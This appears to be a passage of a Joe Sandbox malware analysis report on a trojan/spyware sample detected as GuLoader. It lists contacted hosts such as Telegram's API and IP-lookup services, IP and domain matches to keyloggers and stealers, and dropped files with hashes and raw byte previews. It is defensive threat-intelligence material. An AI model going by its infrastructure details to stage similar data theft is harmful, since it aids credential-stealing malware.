http://checkip.dyndns.org	grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	grrezORe7h.exe	false		high
https://drive.usercontent.google.com/P	grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F58000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/.d	grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E28000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.orgFrH	grrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram	grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/Y40h	grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189.SH	grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndn	grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.181.238	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
104.21.96.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
142.250.185.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588933
Start date and time:	2025-01-11 07:22:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	grrezORe7h.exe renamed because original name is a hash value
Original Sample Name:	ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/8@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 139 Number of non-executed functions: 108
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:24:07	API Interceptor	26517x Sleep call for process: grrezORe7h.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
193.122.6.168	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
checkip.dyndns.com	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
api.telegram.org	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	prlsqnzspl.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
TELEGRAMRU	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	fqbVL4XxCr.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	962Zrwh5bU.exe	Get hash	malicious	Azorult	Browse	104.21.75.48
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
3b5074b1b5d032e5620f69f9f700ff0e	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ZFCKpFXpzx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZFCKpFXpzx.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ZeAX5i7cGB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.225
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.225
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.181.238 142.250.185.225
	AM983ebb5F.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	av8XPPpdBc.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	7uY105UTJU.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	QNuQ5e175D.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	iwEnYIOol8.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.185.225
	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.185.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Institutionalisering.Pla151

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	data
Category:	dropped
Size (bytes):	84676
Entropy (8bit):	4.593537883547379
Encrypted:	false
SSDEEP:	1536:aadyq9kO2bRTYBX+RzIhnAdETUJRJFqIpvhdGprfP:XiRT649EQJRPjpg3
MD5:	8159A2D86C670494AFC0ADB78B7C8D96
SHA1:	C435997868D551D974292AEE95148A57D74187EE
SHA-256:	E22226452363F45A87DC3B3D70EBC85BDF0B9CF806195E2D2B3477FD0D9CC19A
SHA-512:	7533001251FA85D6CB0A2BD0E6711899649E77B59B9A4BD50763D1205B570BAF952F46218F503377C30F0F206E8635E4A9DEB51F3F4BC6883B798C40271E3322
Malicious:	false
Reputation:	low
Preview:	......................H.H.../.R.......ii.................%......2...a......................J....5.dd.'''....w......oo................v..........XX..//.%%%.aa................3..........s.)...W.......=...........................................................b.D...........''.........T.............HHH........>>>>..L............T.44...1........................l.............................r.......AAA............................W.....ZZ.........^^.22.U.A..dd..rr....................T...$..........7.L..4.........h.........8...................F.o.uu............V...aa......hh............p...............................P..................N......h.....................999....222.j..IIII...........}}}}}}..........................................N.............]....zzz..````.....k.....2222.6..n...............<<.88..........6.`...............**........................11................F.\\\\......X......ll.kkk..........,............k...@.--......CC...........8888......................K..........-..V.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	Matlab v4 mat-file (little endian) \231, numeric, rows 2627469422, columns 4278190236, imaginary
Category:	dropped
Size (bytes):	289886
Entropy (8bit):	7.719204939905373
Encrypted:	false
SSDEEP:	6144:7J+RkeB2X2w2mTIfT6sIDELqCEKD9CmfsDI4fYKnBIFuG:iTBBZ4ls+C/Eg9CwWB9G
MD5:	866D60CB22182941AA52F507E4BB366D
SHA1:	DC7A87E547D91E96EAE27603BD294E77F9FF65F8
SHA-256:	CA037EB9952D7A6042B2DC32231AC5FF9B78D6B5D4F56522B882C0BE721B5FD0
SHA-512:	A8E8A93B1C73B7B49551CAC78E418B56EE730B3BD2E1AD4EF05427C8FD9955E7193E7D0CAD3224935CFA995E3C25AC55A753B847FC711FF7661A11EF02A98D69
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub, Author: Joe Security
Reputation:	low
Preview:	....n..........c........]]]]]..C...........................Z................]]]..............)......``../..................==.00...............-...2.8....R...........e.......\.............................JJJJ.............]]]]].................R.....ZZ.((..........................0.........1..............FF...................................H.............$$.hhhhh...'.9..................0.>.....................!.lll.....................W.n..........~.......FFF../.........444..f................44.Y.............RRR..............ll..=.....!.333.......`.....}.....................NNNN..77..........!!...........................t..................U.V...............{{..$.#....z...........E.........??.iiiii........11........=.\.55.MM........I.....h..............^......................................HHH....................................\.www..n......U..,,,..]............;;.6..w...vvv..........HHHHHH................m..........................GG..........f..CC.................................,...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Riprap43.gaw

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	data
Category:	dropped
Size (bytes):	56641
Entropy (8bit):	1.2318917163845036
Encrypted:	false
SSDEEP:	384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
MD5:	39C9A5F767D8C170B5CE38EA8D5734D4
SHA1:	4B4CA81EB3D093645B504004F62A269D4EACDECC
SHA-256:	87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
SHA-512:	AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\forskansningens.txt

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	ASCII text, with very long lines (345), with no line terminators
Category:	dropped
Size (bytes):	345
Entropy (8bit):	4.241929841155785
Encrypted:	false
SSDEEP:	6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
MD5:	AE69FE0F4D1E1115BC470031E661785C
SHA1:	8D3799826FE457C61C1E8EE5E3071683A8125BC5
SHA-256:	6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
SHA-512:	969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets\fyldebtten.soi

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
Category:	dropped
Size (bytes):	210366
Entropy (8bit):	1.240975322465592
Encrypted:	false
SSDEEP:	768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
MD5:	AEF78D8D561E8802286A78AAC6C73ED6
SHA1:	DDF5DA649482D0A553802827BB9F0EF64A7069E1
SHA-256:	45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
SHA-512:	93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets\wildwestfilm.sto

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	data
Category:	dropped
Size (bytes):	363811
Entropy (8bit):	1.2512349423386382
Encrypted:	false
SSDEEP:	768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
MD5:	BFEA15C03AB295424981A73637A19491
SHA1:	A5ADABDDC373D6B3004F96946D84B651E42D9F5C
SHA-256:	83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
SHA-512:	CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
Malicious:	false
Preview:	...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............

C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.655335921632966
Encrypted:	false
SSDEEP:	192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
MD5:	EE260C45E97B62A5E42F17460D406068
SHA1:	DF35F6300A03C4D3D3BD69752574426296B78695
SHA-256:	E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
SHA-512:	A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 14lVOjBoI2.exe, Detection: malicious, Browse Filename: Qg79mitNvD.exe, Detection: malicious, Browse Filename: FILHKLtCw0.exe, Detection: malicious, Browse Filename: ppISxhDcpF.exe, Detection: malicious, Browse Filename: m0CZ8H4jfl.exe, Detection: malicious, Browse Filename: PURCHASE ORDER TRC-090971819130-24_pdf.exe, Detection: malicious, Browse Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Benchership141.lnk

Download File

Process:	C:\Users\user\Desktop\grrezORe7h.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	1178
Entropy (8bit):	3.263725083680734
